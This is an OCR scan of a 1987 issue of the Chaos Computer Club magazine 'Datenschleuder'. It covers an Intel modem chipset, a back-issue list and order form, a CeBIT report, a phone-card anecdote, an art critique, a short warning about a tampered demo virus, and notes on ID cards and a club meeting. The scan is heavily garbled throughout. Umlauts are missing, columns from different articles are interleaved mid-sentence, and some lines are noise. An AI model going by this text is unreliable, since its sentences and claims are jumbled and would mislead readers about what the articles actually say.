Intel stellte am 1 Januar zwei VLSI-Bausteine fr die R e a I i * ! Y sierung von Modems mit einer bertragungsrate bis 2400 BPS vor. Dieses Chipset (89024) untersttzt den Vollduplex- Betrieb. Der usserst hohe Integrationsgrad dieser ICs ermglicht dem OEMKunden die drastische Reduzierung von zustzlichen externen Bauteilen, z.B. MikroControllern oder Speichern, sowie der Abmessungen der Platine seines Endproduktes. Das Modem-Chip-Set 89024 besteht aus zwei Bereichen: Dem 89026, einem anwendungsspezifischen Prozessor, und dem 89024, einem analogen 'FrontEnd'-Interface. Vergleichbare Lsungen bestehen fast immer aus drei oder mehr ICs. Die niedrige Anzahl von ICs bei dem Intel-Chip-Set 29024 stellt eine hhere Zuverlssigkeit dar und bringt dem Anwender eine Kosten-pro- Bit-Ersparnis von ca 33%, verglichen mit 1200-BPS Modemlsun !Y gen. Das Set untersttzt den Vollduplex-Betrieb von 0 bis 2400 BPS und entspricht folgendem internationalem Kommunikationsstandards: V.21 V.22 A&B und V.22 bis, sowie Bell 103 212A. Die Firmware des 89024 ist segmentiert und erlaubt hierdurch den Einsatz des intel-eigenen Befehlssatzes oder die Kombination mit I kundenspezifischen Befehlen und Besonderheiten fr die Erstellung von unterschiedlichen Endprodukten. Der 89024 ist z.Z in Musterstckzahlen erhltlich. | Der Preis betrgt D M 82,- (bei 25000 Stck).
gefunden in: Elektronik Jornal 1/2/S7 ISSN 0013-5674 M O D C H I I 9 . D O C 19870327 1540

Datenschleuder Ol Der CCC stellt sich vor / Hardmare fr Hacker / Die Hacker - Hsrame Datenschleuder 02 Hack mal wieder f Modem ohne Otlenbaningseid Datenschleuder 03
H e s s e n & P r l e n / B T X heisst B i l d s c h i r m t r i *

Datenschleuder 04
Telebox/ Ultravollslndises

Datenschleuder 05/06 Comnnter Tutorial / Packet Radio Datenschleuder 08 Rat lr Piraten / PostDrlsatz/ SchrumoLBlh & Wrlel Datenschleuder 09 / 1 0 DF-Greiizlagen/ CCC '84 - Machlese Datenschleuder 11 / 1 2
Kennwort Hacldete / Computerkriminalitt / Acs ir Amateurfunk ?

2.50 2.50 2.50 2.50 2.50 2.50 2.50 2.50

Datenschleuder 15
W o bitte gibts n e N U I ? / T r a r a - die Post ist d a ! / W i K G

Datenschleuder 16 Hille Hacker / CCC - Satzung / NUI oft Datenschleuder 17 CCC '86 / Comoutervinis 'Rush houi" I Kompromittierende Abstrahiung Datenschleuder 18
C o m p u t e r V i r e n - D o k u m e n t a t i o n I D P A hackt / V o l k s z h l u n g 'B7

Datenschleuder - Abos
Gelten fr jeweils ein Chaos - Jahr und umfassen etwa acht Ausgaben, sofern nicht hoherere Gewalt anders entscheidet C C C - Mitglieder erhalten die DS automatisch, mssen also nicht extra abonnieren, drfens aber zwecks Aufbesserung unserer Kasse.' 1 e, 30.00 Ersatzdienstler und sonst sozial Benachteiligte

FF-Datenschutz Rekordbehandlungsdauer im Bundestag


In seiner 255. Sitzung gelang es dem Bundestag am 10. Dezember 1986 in wenigen Minuten ohne Aussprache zu beraten ber den 6., 7. und 8. Ttigkeitsbericht des Bundesbeauftragten fr Datenschutz und neben der mehrheitlichen Verabschiedung des 6. und 7. den achten an die Ausschsse zu verweisen und so die Bedeutung des Datenschutzes im Parlament durchzustreichen. wau.
Q : DatenSchutzBeraler 2/87.16.

Standardabo fr Otto - Normaluser Frderabo fr Gutbetuchte

60.00 120.00 Summe dieser Seite

II ' /

feP-

DS

Seite

r^Tif ^nlcitfirjlclllcr

DS Seite 7

i ' isdsn Hushall isi ein Wohnngsbocen und lr jede Pe'v i Haushalt in Personenbognn ausiuliien. beispielsweise au i' Siuglinue. Hausgehilfinnen und Personen mit vrejierer Wc ung oder Unlerkunlt/Zunmer

Mitgliedschaft im Chaos Computer Club e.V.


Betrag Summe

Stckpreis Anzahl Summe 60.00 120.00 ab 2<10.00 20.00 33.33 D i e H a c k e r b i b e l , Teil Eins Das unentbehrliche Nachschlagewerk lr Hacker und solche die es werden wollen. Texte von und fr Hacker, Dokumentation, Metnungen, Lebenshilfe, Lesespass. Aus dem Inhalt: das Basic-Gefhl 4 Neues vom C C C * Der Code des HaSpa - Coups 1 Computer & totalitrer Staat * Satellitenhacking * und 1 und * und ... 260 Seiten Din A4 ISBN 3-922708-98-6 Grner Zweig

Jahresbeitrag fr Schler, Studenten, pipapo Jahresbeitrag fr Otto Normaluser Jahresbeitrag fr besonders Finanzstarke (frderndes Mitglied) Einmalige Verwaltungsgebhr bei Eintritt

Mitglieder des CCC erhalten automatisch die Datenschleuder zugesandt und sind aufgefordert, aktiv an der Arbeit des Vereins teilzunehmen. Die Mitgliedschaft im CCC berechtigt zur Inanspruchnahme verbilligter Accounts auf der INFEX - Mailbox sowie zum Zugriff auf die Clubbretter der CLINCH Mailbo. Fr alle Veranstaltungen des CCC wird ermigter Eintritt gewhrt.

S t u d i e fr den geplanten Computeremsatz der Fraktion ' D i e Grnen' im Auftrag des Deutschen Bunde5tages_
'Die Einfhrung der Computertechnik gestaltet sich fr die Grnen im Bundestag so schwer, wie ir andere der Ausstieg aus der Atomindustrie. Fr beide geht es an die Strukturen.'

7.50

Teilnahme an der INFEX - Mailbox


Einmalige Eintragungsgebhr Mindestnutzung pro Monat Verbindungsgebhr pro Minute Jede versandte Nachricht Datenbank, Telex, Intermail 8.00 0.15 0.07 nach Nutzung 20.00

R e c h t s f i b e l fr den richtigen Umgang mit der Polizei und anderen Amtspersonen sowie Institutionen. Ein Ratgeber fr Alle, die bei Wahrnehmung ihrer demokratischen Rechte den richtigen Umgang mit staatlichen Organen ben wollen.' 120 Seiten DIN A6 ISBN 3-88012-679-8 VMB

5.00

Die INFEX ist ein kommerzielles Mailboxsystem mit acht parallelen Ports, d.h. acht Benutzer knnen parallel im System arbeiten und die GeoNet - Dienstleistungen nutzen, zum Beispiel Datenbankdienste, Telexversand und - Empfang, Intermail zu anderen GeoNet - Boxen, von und nach BTX, etc. Die in der Box verursachten Gebhren werden direkt mit dem C C C abgerechnet, wir geben alle Gebhren zum mit Infex bestens bedient Selbstkostenpreis weiter. Wer einen preiswerten Anschlu an die kommerzielle Mailboxszene sucht, ist

Was Sie gegen Mikrozensus und Voikszziilung tun knnen.


Ein praktischer Ratgeber fr alle, die sich mit der Volkszahlung und den damit verbundenen Rechtsproblemen beschftigen. 300 Seiten DIN A6 2001 Verlag 18061

Iniopaket 1 - ComputerViren Eine Dokumentation von S.Wernery , die das Thema Computerviren ausfhrlich beleuchtet. Das Infopaket besteht aus einer MS-Dos Diskette 5 1/4" mit einem Demo-Virus sowie 100 kB Dokumentationstexte.

25.00

If^hlLlI i s j m
3

Teilnahme an der CLINCH - Mailbox


Einmalige Eintragungsgebhr Monatsgebhr fr Schler etc. Monatsgebhr fr Normalverdiener Intermail, Telex, etc 2.00 5.00 nach Nutzung 10.00

Aufbacker "Achtung, Abhrgefahr'


Din A l - Bogen mit 64 Backern, ungeschnitten, postgelb

3.33

Die C L I N C H - Mailbox ist ein nichtkommerzielles Mailboxprojekt, das versucht, eine preiswerte Alternative zu den kommerziellen Systemen zu sein. Derzeit stehen ein Telefon- und ein Datex-Port zur Verfgung, die wahlweise genutzt werden knnen. Die Leistungen der C L I N C H - Box sind ein Subset der Leistungen von GeoNet - Boxen, soweit dies auf einem MS-Dos - System machbar ist Die Abrechnung der Nutzungsbeitrge erfolgt direkt mit der C L I N C H - Box. C C C - Mitglieder erhalten Zugriff auf spezielle Bretter, die dem normalen Nutzer nicht zur Verfgung stehen. Der C C C wickelt ber die Box Koordinierungsauigaben des Vorstands und der Redaktion der Datenschleuder ab. 1 Strichmarkierungen ' " e s o markieren
Summe dieser Seite Bitte bei allen Bestellungen beachten: Alle Anfragen an den CCC etc. nicht zusammen mit der Bestellung auf uns loslassen, sondern mit getrennter Pos! schicken, das beschleunigt zumindest die Bearbeitung der Bestellung. Beigelegter Rckumschlag beschleunigt noch mehr, wenn selbiger auch noch ausreichend frankiert ist. kann es passieren, da es teuflisch schnell geht. Manche Sachen sind manchmal nicht vorrtig. Wir erfllen dann die Bestellung soweit als mglich und legen den Rest zurck, bis Material da ist. Achtel bitte auf schnste Sonntasschrift. wenn Ihr Eure Adresse nicht mit dem Drucker / Stempel anfertigt, wir haben keine Zeit, dauernd mit den Fetzen in die Apotheke zu rennen. Sendungen mit besonderer Versendung;forni f Einschreiben, Nachnahme, etcl werden von uns grundstzlich weder verschickt noch angenommen, es sind grundstzlich nur die im Bestellfetzen aufgefhrten Zahlweisen zulssig.

. .

Hinweise zum Ausfllen der


Aus Grnden MH VOM STATISTISCHEM LANDESAMT AUSZUFLLEN ; ! ! " Um, der bersichtlichkeit und besseren Lesbarkeit Bezeichnungen dsr einzelnen Perscnengruppen

Erhebungsvordrucke
wurden nicht durchgngig Wir bitten hierfr weibliche um Ihr und mnnliche Verstndnis:

verwendet.

DS Seite 8

DS

Seite

I ^

Strichmarkierungen bitte so markieren

fr

BesteUIetzen 1987

?
_)

Personenbogea Name

Vorname Strae / Hausnummer Postleitzahl/ Ort Bei Beitritt in den CCC sind zustzlich diefolgendenAngabe zu machen: Geburtsdatum Telefon Bei Teilnahme an der INFEX der CLINCH - Box sind zustzlich die folgenden Angaben zu machen Genutzername Passwort zur Facheinrichtung Hilfszeile Bei Benutzern amen und Passurart sind nur alohannmerische Zeichen A-Z, 0-9. sowie Satzzeichen Punkt und Bindestrich zulssig. Leerzeichen ist unzulssig.
(M 11 und rr*nr ^ f n o m r Im taiM bm wwilmn Hitmltvnmltbogtn MWKMMn)

Messebericht C e B I T

Und jetzt noch das dicke Ende: Bitte die Summen aller Seiten des Bestellfetzens addieren und hier eintragen. Meine Bestellung hat den Gesamtwert von DM

3 S s

Allgemein gab es auf der CeBIT in Hannover, dem Mekka der Computerfreaks, dieses Jahr keine umwerfende Erfindung oder Neuerung zu sehen. Ideen wurden verwirklicht, Produkte verbessert, Kontakte geknpft oder vertieft. Die diesjhrige CeBIT stand im Lichte des Fleies. A u f dem Hardwaresektor wurde der gerade geborenen Intel 80386er- Maschinengeneration ein reges Interesse entgegengebracht. Der wohl bemerkenswerteste Vertreter dieser Rechnerart drfte der neue Apricot XEN-386 sein, der besonders durch seinen Preis von knapp 10 K.DM incl. 30 MB Harddisk und einem M B Hauptspeicher hervorsticht, dabei jedoch verglichen mit den Konkurrenten keine Leistungsdefizite aufweist. Tandon verzichtete auf einen 386er, griff dafr die Idee der tragbaren Festplatte auf und entwickelte ein Harddisk-Stecksyslem sowie ein Plastikgehuse, mit dem man den 3,5 Zoll FestplattenWeitwurf schadlos ben kann. Den mit 1.850 USDollar billigsten 386er wollte eine 1974 gegrndete, taiwanesische Firma namens I M C an den Hndler bringen. Die Frage, was man denn mit der Rechnerleistung der 80386er Maschinen anfangen knne, wo doch das gute alte MS-DOS nur 8086er kennt, wurde nun auf verschiedene Weisen beantwortet. Eine Mgliche Antwort gab "The Software Link" (bekannt durch MultiLink) mit dem gerade fertiggestellten Betriebssystem PC-MOS/386. Dieses System teilt den Speicher j e nach Bedarf der einzelnen Applikationen in bis zu 25 virtuelle MS-DOS PC's auf, von denen einigen oder allen ein Terminal bzw. die Rechnerkonsole zugeordnet werden kann. Jedes Terminal kann sich auf jeden Task aufschalten, sofern es die Zugriffsrcchtc besitzt. Die Command-Shell wurde um einige, besonders fr Programmierer ntzliche Kommandos erweitert. Bei einer Demonstration konnte ich mich davon berzeugen, da zumindest die gngigsten MS-DOS-Programme auf den Terminals liefen. Fr Cracker bietet das System keinerlei Angriffspunkte, da es ohne Kopierschutz geliefert wird. Microsoft wollte zum Thema Protected Mode D O S noch keine verwertbaren Informationen herauslassen. Bei den Motorolas blieb es etwas ruhiger in den Entwicklungsabteilungen. Apple bohrte den Mac mit einem 68020 auf, Alan versucht es nun mit 4 MB Hauptspeicher und einer endlich abgesetzten Tastatur, oh welch Pein ist mir von den Hnden genommen. Auerdem will Jack den Peripheriemarkt mit einem billigen Laserdrucker, den Videospiel-Markt mit einem gestrkten Image, den PC-Markt mit einem Ibm-Kompatiblen, und den US-Markt mit 75 MegaDollars erobern ("Wir befinden uns ab sofort im Krieg."). Commodore hat seinen Ideen nur im Sinne mannigfaltiger Gehuse- und Ausstattungsvarianten freien Lauf gelassen. ( ^ f ^ r j i t SntcitSK|!riihrr

Digital Equipment hat unsere unmiverstndlichen Verlautbarungen endlich erhrt und will eine MicroVAX mit zugeklebtem Q-Bus und einer (zugegebenermaen lcherlichen) 40 MB Platte sowie 4 MB Hauptspeicher fr etwa 20 K D M auf den Hackerumworbenen Markt bringen, die MicroVAX 2000. Wer von euch auch eine Haben mchte, tue dies rechtzeitig kund, damit wir vielleicht im Dutzend billiger kaufen k n n e n . . . Es lohnt sich auf jeden Fall, schonmal die bisherige Software von unseren Satteliten wieder einzusammein und zu archivieren. Fr die Kommunikatoren werden sich als schwacher Trost fr die Datex- Gebhrenerhhung bald preiswerte 2400 baud Vollduplex-Modems etablieren, ein erstes wechselte bereits auf der Messe fr D M 300,zugunsten eines Hackers den Besitzer. Auch die Post plant die Einfhrung von V.22/V.22 bis Modems zum bisherigen Preise des D1200S-12. Eine Nutzungsmglichkeit derselben soll es zunchst fr Bldeltext, spterauch frPatex-Dgeben. Erstmals ffnete sich ein Anbieter von High-End Graphik- und Animationsmaschinen dem sterblichen Besucher. Bei Symbolics erklrte man bereitwillig jedem. was dieses Lisp-System zu bieten hat: Color Video Digitizer, Echtzeitanimation auf beliebig definierbaren Ptden, professionelle Video-Schnittstelle fr M A Z , Texture Mapping (Das Aufziehen von Oberflchenmustern auf einen Krper) und einen sehr komfortablen Animations-Editor/Debugger. Bei Evans & Sutherland gab man sich bedeckter. Das Modethema des Jahres ist Desktop-Publishing, fertige Lsungen sind allerdings rar. Der Begriff versucht das zu beschreiben, was die Redaktion der D A T E N S C H L E U D E R seit Bestehen zur Produktion nutzt, nmlich die Textgestaltung auf dem Microcomputer sowie die Ausgabe auf Laserdrucker oder Fotosatzbelichter. Witzige Zugangssicherungen haben sich einige Anbietervon Sicherheitssystemen ausgedacht: Berechtigungsnachweis durch Fingerabdruck. Zustzlich kann auf Kundenwunsch die Fingertemperatur, der Puls des Probanden, und die Finger- Leitfhigkeit gemessen werden. Das System funktioniert auch noch mit einer leichten Verletzung des Fingers, da nur etwa fnfzig von hundert Bildpunkten bereinstimmen mssen. Es knnen darberhinaus beliebig viele Reservefinger definiert werden. O b dieses System auch ein Frischgekochtes Abbild aus verdicktem Himbeer/Vanille- Pudding akzeptiert, konnte bisher nicht geklrt werden, da dem betreffenden Redakteur der Pudding milang. Wie bei jeder CeBIT fand auch diesmal das Traditionelle Hackertreffen am Dienstag auf dem grten Poststand statt. Es kamen ber hundert Hacker, von denen ich wegen Versptung nur noch etwa zwanzig zu Gesicht bekam, um Informationen, Ideen und Gre auszutauschen. Von Bayern bis SchleswigHolstein waren die Hacker nach Hangover gepilgert. Es wurden Gesprche begonnen, die des Abends in. einer wohlgestalteten Kneipe vertieft oder verflacht* wurden. Das Treffen hat gezeigt, da viele Hacker zusammen mit ihren Maschinen lter und professioneller geworden sind, d.h. in die Industrie Eingetreten sind, und der Nachwuchs dnner gest ist, als zu Beginn der hiesigen Hackerkultur. Die Computerwelt hat ein wenig von Mythos und Faszination aus der Pionierzeit eingebt. Das Chaos hat Punkte an die Sachzwnge abgegeben. Vic CEBITVt9.DOC 19870327 I4IJ

Ich zahle diesen Betrag B a r Q in P o s t w e r t z e i c h e n Q per V - S c h e c k [ H per berweisung | | (Zutreffendes markieren, andere Zahlweisen sind grundstzlich nicht mglich) M e i n e Mitgliedsbeitrge fr den C C C werde ich knftig wie folgt zahlen:

1/4 - jhrlich P I 1/2 - jhrlich So. Und nun bitte die Bestellseiten heraustrennen ( sie sollte, wenn alles klappt, ohne Verlust wertvoller D S - Texte aus der Mitte heraustrennbar s e i n ) , in einen Umschlag tten u n d frankiert absenden, und zwar an uns:

Bar

per V - Scheck.

per berweisung jhrlich

Cbaos Computer Club e.V.


Schwenckestrafle 85

2000 Hamburg 20

ft* AbeM M w K < i M t M m UmicH*9 brtt wib*dii*l Nn*n. anaclwtaiAO w m letlit tadig t n c ^ n t m ArbtKitt. fr A M Fr*e*oew mrt. tut etm UmcM0 m o *

Die K o n t o n u m m e r fr Uberweisungen isc 59 90 90 - 201 beim Postgirosamt Hamburg, Bankleidzahl 20010020, Kontoinhaber ist der Chaos Computer Club e.V.

1 DS Seite 10

MViwckUld

Bx|

Kprto-Nr.

e <tfiq

Unterschrift BnHitnN

gxjTttl M

DS Seite 11

Kriegserklrung von A T A R I Eindrcke von der CeBIT'87 Preisverfall im GIPS-Bereich Maschinenlesbares G e l d ?


Auf der CeBit'87 gab es viel Neues zu sehen. Sogar die Deutsche Bundespest versuchte sich mit neuen Technologien. Sie stellte ihr Kartentelefon vor. Es gab eine Demokarte mit fnf Einheiten im Wert von 1,50 M D M (Maschinenlesbare Deutsche Merker). Nachdem ich mich gegenber dem Postler als CCC'lervorgestellt hatte und er den Schock verdaut hatte, kam er damit, da die Karten mit Chips (Eproms!) arbeiten und diese ABSOLUT sicher seien. Wieder in Hamburg dachte ich mir, man knnte die Karte ja mal ausprobieren. Ein Kartentelefon war schnell gefunden (ca. 15 Min). Das Telefon nahm meine Karte sogar an. Voller Stolz mit so moderner Zwar bringt Tramiel die Rechenleistung einer C R A Y noch lange nicht im Handheld-Format unter, aber eine xx-GIPS-Maschine von S Y M B O L I C S pat locker unter den Schreibtisch. Fr deutlich weniger als eine halbe Million Dollar lassen sich mit diesem Gert Bilddaten verarbeiten. Bilddaten und Mustererkennung Das Auge hat im Verhltnis zur Flche den wohl grten Datendurchsatz. Die nachfolgende Verarbeitung ist weitgehend ungeklrt. Immerhin bietet CAN O N fr den Preis eines besseren Foxtrottels einen dort anschliebaren Bildleser, der eine A4-Seite mit etwa 12 Linien pro Millimeter einliest und mit gleicher Auflsung auf einem Laserdrucker ausgibt. Auerdem wurde Zeichenerkennung blicher Schreibmaschinenschriften gezeigt. Derzeit ist noch unklar, ob diese Zusatzsoftware weniger oder erheblich mehr oder wieviel im Verhltnis zur Hardware kostet. Immerhin gibt es Programme, die mehr als das 50fache der zugehrigen Hardware kosten. Insgesamt ist die maschinelle Erzeugung des bewegten Gesichtsbildes noch nicht rentabel und ein englischer, mit SatAn empfangbarer Fernsehsender mietet einen lebendigen Fernsehsprecher und erweckt durch maschinelle Vereclung und massig Schminke den Eindruck einer Roboterproduktion ("Max Headroom"). Das ist billiger als derzeit nicht verfgbare Computerkapazitt. SatAn steht mit groen Buchstaben auf dem Dach des Z D F und ist ein eingetragenes Warenzeichen der Antennenfirma Kathrein. Mittelalterliche Frsten sperrten einen klapp Yogafhigen guten Schachspieler in einen kleinen Holzkasten mit innengesteuerter mechanischer Figurenbewegemechanik, um hohe Gste zu beeindrucken. Im brigen ist Knstliche Intelligenz ein Schlagwort, das von vielen benutzt wird, die nicht einmal die niedrigste Stufe davon, nmlich die Computerviren,begriffen haben. wau
cebitwl9.doc 12.03.

art Her?
Dokumente 1986: Klaus Geldmacher baut "ohne Titel* aus Staiilwinkelprof ilen, Ventilatoren, Leuchtrhren, Tontrgern und VerstArkem. Kinetik war eines der Zauberwort*, Liehtobjekte ein anderes, art-vare 1987: Klaus Geldmacher baut "ohne Titel" aus Leuchtrhren, Allgebrauchslampen, Tontrgem und Verstrkern, und ganz neu - etwas Farbe und allerlei Unrat. Kunst und Elektronik heit jetzt das Zauberwort? Bochumer Kunstwoche 1973: TV-Cello und TVBett mit Charlotte Moorman und Nam June Paik (die ersten Arbeiten Paiks'mit Moorman und TV-Cello stammen aus den 6 0 e m ) . Elektronik-Freaks der spten 8 Oer, ihr wrdet ausflippen ber die alten Arbeiten von Paik/Moorman - wenn ihr sie nicht schon kennt II Aber ein schlichtes Video-Bett mit angesteil-tera Kopfteil und Fujiende auf der art-ware 1987? Elektronische Kunst?? Wir knnen natrlich sffisant mit den Achseln zucken: "Thematische" Ausstellungen kennen wir aus den letzten 10 Jahren zur Genge: Wir haben zu allen erdenklichen und gegenstzlichen Themen immer wieder die selben Arbeiten gesehen, was regen wir uns auf. "Kunst und Elektronik* also das flockig unverfngliche Thema fr das auagehende achte Jahrzehnt? Und berhaupt nehmen wir die Kunst schon lange nicht mehr ernst, nd hier fallen mir doch sofort ein paar ernste Dinge ein. Werden Knstler und Ausstellungsmacher denn nicht gewahr, da was sie machen gar nicht mehr wirklich ist? Gerade hier - nmlich auf einer Industrie-Messe - wo Wirklichkeit sich vor uns auffchert: faszinierend, phantastisch , bengstigend, unvorstellbar, brauchbar, codiert, transparent, unbegreiflich, kuflich ... hier ist art-ware einfach unwirklich. Weil doch gerade hier die Chance geboten ist, iiber weltweite Vernetzung (hier sind ja Telefone keine Attrappen), elektronische Infrastruktur und die Allgegenwart des elektronischen Mediums - Kunst und Elektronik? - in die wirkliche Wirklichkeit einzugreifen! Statt dessen ein bichen technisierter Bluff fr einen braven Brger, der vor der Technik mehr Furcht hat als Ahnung von ihr, ein bichen aufgemotzte sthetik aus den S O e m , mehr nicht. Und das mit den technischen Mglichkeiten fr morgen? Ich frage mich immer wieder, und hier besonders: wo leben Knstler (und Ausstellungsmacher) eigentlich, was- ist ihre Wirklichkeit? Die sthetik vergangener Jahrzehnte? Dann knnen wir unsere Aufmerksamkeit getrost abwenden von der sogenannten Kunst, ohne Schaden zu nehmen. Oder 90ll hier demonstriert werden, anhand von schlechten - es ist ein Jammer! - und verflschten Beispielen, wie weit schon vor ca. zwei Jahrzehnten ein paar Knstler beispiellos zu denken bereit waren? Das wre kein schlechter Einfall, knnte man doch so vielleicht den Widerwillen gegen alles was Kunst heit nicht nur der jungen elektronikverliebten Zeltgenossen ein wenig Aufweichen, Die Frage ist ja gar nicht, ob sich hier kleinkrmerhafte Vorstellungen der Ausstellungsmacher oder Phantasielosigkeit realittsfremder Knstler als Ware verwirklichen? die Frage ist vielmehr, wo sind die "wahren Knstler", die sich die Mglichkeiten der Komunikation mittels elektronischer Medien lngst zu eigen gemacht haben, die in den immateriellen Rumen der weltweiten und der lokalen Netze lngst eine neue 'ffentlichkeit* gefunden haben. Auf der art-ware 1987 sind sie nicht, auf der CeBit'87 ist der eine oder andere zu finden. Ihre Arbeit ist wenig spektakulr: Kommunikation ist nicht stofflich und gar nicht monumental, artware-Macher scheinen sie gar nicht wahr zu nehmen.

Technik umgehen zu knnen, rief ich einen rtlichen Freund an. Nach ca. 1 Chaoseinheit (8 Min.) vernahm ich einen Pfeifton und die Meldung: "Karte wechseln". Als anstndiger Brger meinte ich zum Telefon, da ich noch 4 Einheiten htte. Ergebnis: Die Verbindung wurde unterbrochen und das Telefon behauptete: "Restguthaben 0,00 D M " . Entweder hat die DBP die Gebhren heimlich erhht oder das Gert war von X X X X (Name zensiert). Man stelle sich einen normalsterblichen Menschen vor, der sich 200 Einheiten fr 50 D M kauft und sowas erlebt. Der wird ja schwarz vor Schilling. Abschlieend wre noch zu sagen, da mir zu Ohren gekommen ist, da die DBP 50.000 N M D M (nicht maschtnenles. D M ) fr einen absolut sicheren Chip bietet. Die Pest mge dies bitte besttigen oder dementieren, denn N M D M ist auch Geld. Wenigstens drfte das Kartentelefon eine glorreich kurze Zukunfthaben. terra
87032514262 mshgldty.doc

I
D e r

Virus war da

Der auf dem CCC86 vorgestellte und zwischenzeitlich verbreitere MS-DOS Demovirus VIRDEM.COM, der ursprnglich nur auf Laufwerk A: seine Qualitten unter Beweis stellte, ist. jetzt in einer "Sicherheitsfcopierten" manipulierten Version aufgetaucht. Bei der jetzt sichergestellten "Sicherheitskopie" war die Laufwerkbezeichnung auf C: gendert. Die Redaktion weist aus diesem Grund daraufhin, da zu Testzwecken versiegelte DetooViren von der Redaktion bezogen werden knnen. Bei Kopien von 'Freunden" besteht die Gefahr einer bsartigen Verbreitung. Weiterhin sind beim CCC neue Viren eingegangen. Uber Hailboxsysteme verbreitet sich derzeit der Programmquellcode eines berschreibenden Virus in TURBO-PASCAL. Dieser ist zwar "primitiv geschrieben, eignet sich aber durch die gute Kommentierung zur Entwicklung weitaus bsartiger PC-Viren- Mehr tiber Viren im nchstem Heft, oder fr die, die nicht warten knnen auf unserem sterlichen VirenForum.

Vielmehr scheinen sie mit dem Hinweis auf die "wichtigen Erkentnisse fr unser postTECHNOLOGISCHES (WAS IST DAS?) Zeitaltereinen rckwrts gewandten Salto Mortale zuviel gemacht zu haben: post-technologisch heit soviel wie VON TECHNOLOGIE KEINE SPUR, und wir befinden uns wieder oh Wunder - in der akademischen sthetik der ausgehenden Romantik. Von hier aus knnen wir nun endlich begreifen, warum " Femsehschirme, Personalcomputer, Video usw. ernst zu nehmende Ausdrucks- und Gestaltungsmittel" (so ernst wie Pinsel und Meisseil) "einer ganz neuen internationalen Kunst-Richtung" sind. Und wenn wir dann schon mal unserer Zeit weit voraus sind, drfen wir auch noch einen Blick in ferne Zukunft wagen: Wenn Gerry Schmm einmal in den 60ern des 20sten Jahrhunderts seine 'erste" Video-Galerie erffnen wird, so wird es nur Schnee von gestern sein, und ebenso wenig wird es uns dann beeindrucken, wenn ein gewisser Duchamp im ersten viertel des selben Jh.s nicht mehr mit Pinsel und Meissel aber auf Glas arbeiten, dann nur noch Schach spielen wird, und - ach!, Infra-mince und Yves Klein beim Verkauf von immateriellen, malerischen Sensibilittszonen! und erinnern uns wieder an Nam June. Paik... Verlassen wir die Gegenden, in denen Knstler versuchen, eine Art Ware aus einem heien Brei zu bereiten, den sie in Wirklichkeit aber nur umschleichen und beschwrend immer wieder IST-ZEIT nennen. Und, wie schade, jetzt ist schon Zeit aufzuhren, weil die Seite zu Ende ist.

LS2S - VIREN.Txt

mrina

kern

DS Seite 12

3n'eni<fljlctibcr

DS Seite 13

Kommentar:
Bildschirmtext, Hacker und kriminelle Postler Gerade in Zuge der Einfhrung von ISDN, welches.noch weit mehr Manipulation und Protokollmglichkeiten bietet, gewinnt diese Frage eine existenzielle Qualitt.
Der WSC hraeschinenfeste Personalausweis

Ostern '87 in Hamburg II. VirenForum und Mitgliederversammlung Zu Ostern, genauer am 13. und 19. April treffen sich in Hamburg Hacker, Freaks und Datenreisende zu einem Arbeitstreffen. Neben einem Workshop ber ComputerViren, der nichterrtarte Bereiche des VirenForums vom CCC'96 vertiefen soll, trifft man sich zum Infomationsaustausch sowie zur 1. Mitgliederversammlung des CCCeV. Veranstaltungsort ist wieder das Eidelstedter Brgerhaus (Eibgaustrae 12, Hamburg 54), jedoch nicht in der rumlichen Gre der CC-Congresse. Angemietet wurden, ab Samstag morgen bis Sonntag abend, nur die Aula sowie das Cafe und ein weiterer Konferenzraum - auf Technik wird weitgehend verzichtet. Die reilnahmemglichkeiten sind somit auf ca 100 Personen begrenzt.

Strategien der Deutschen Bundespost

Zwei Machtrge in Jahresbericht des Berliner Datenschutzbeauftragten erscheinen der Redaktion berichtenswert. *Zu den vom Hamburger Datenschutzbeauftragten federfhrend durchgefhrten Untersuchungen zum spektakulren fall des Hamburger 'HackerClubs, der unter der Identitt eines Kreditinstitutes fr 135.000,DM gebhrenpflichtige Seiten abgerufen hatte, berichtete ich (der Berliner DSB, die Red.) im Vorjahr ber den damals als sicher geltenden Erkenntnisstand, da unbedachter Umgang mit dem geheimen Kennwort urschlich sei und nicht ein Fehler des Btx-Systems. Da zwischen dem Redaktionsschlutermin des Berliner und des Hamburgischen Datenschutzbeauftragten zum Jahresbericht 1985 der Bundesbeauftragte fr den Datenschutz aufgrund eines Amtshilfeersuchens des Hainburgischen Datenschutzbeauftragten bei der Prfung des Btx-Systems zu dem Ergebnis gekomaen war, da ein technischer Mangel des Btx-Systems als Ursache nun doch nicht auszuschlieen war, ergab sich somit ein Unterschied zwischen der Dartsellung des Hamburgischen Datenschutzbeauftragten und meinen Ausfhrungen, der von der Bilschirmtext-Fachpresse als Heinungsunterschied interpretiert wurde. Selbstverstndlich ist die Darstellung des Hamburgischen Datenschutzbeauftragten letzter

jemandem drfte entgangen da seit dem l. April von den personalausweisbehrden der neue maschinenlesbare Personalausweis ausgegeben wird. Diejenigen, die im einen Waschtag einlegten und Mrz einen a u f den letzten Drcker noch der Papplappen ergatterten haben (sollte der Ausweis einem Ordnungshter nicht in den Dreck fallen) bis 1992 Ruhe. Der Rest darf sich freuen. Beim neuen Ausweis entfllt nchst das Ausfllen eines Antrags durch den Bittsteller, dieses wird von der Personalausweisbehrde (oft die Meldemter) bernommen. Zunchst wird im Antrag gekennzeich- Geplant ist: net ob der Brger "schreibkundig" oder "schreibunkundig" ist. Dieses Freitag 17. April - Anreisetag fr bemachtungsmgmu man ja wissen, da "schreib- Interessierte lichkeiten mglichst privat besorgen unkundige* ja den Ausweis nicht Zeit fr private Gesprche. unterschreiben knnen. Folgend wird das Passbild (gemessen vom Haaransatz bis zur Kinnspitze Samstag 18. April - ab 10 Uhr Einin einer Hhe von 20 bis 25mm) treffen der Hamburger Crew zwecks mglichst schwarz/wei mit einem Einrichtung der Rume - somit ab helleren Hintergrund in Fortmat 35 12 Uhr Eintreffen der Teilnehmer des Virenforums - ab 14 Uhr Vorgesprche' x 45 mm entgegengenommen. Der Antrag wird daraufhin mit einer und festlegen des Ablaufplanes (der Schreibmaschine (Schrift OCR- Bl, genaue Ablauf richtet sich nach den Tipp-Ex erlaubt) ausgefllt. Dabei Intereaaen der Teilnehmenden Permssen folgende Felder ausgefllt sonen) - dann Workshops bis ca werden: Seriennummer, Antragsdatum, 18 Uhr. Familienname, Vorname(n), Geburtstag, Geburtsort, Wohnort (Haupt- Samstag 18". April - ab 20 Uhr Mitwohnsitz) , Gre und Augenfarbe. gliederversammlung des CCCeV in Stand der Angelegenheit." Der CCC wird den vollstndigen weiterhin' sollen folgende~ "Kann- der Aula, der bliche Vereinskraii 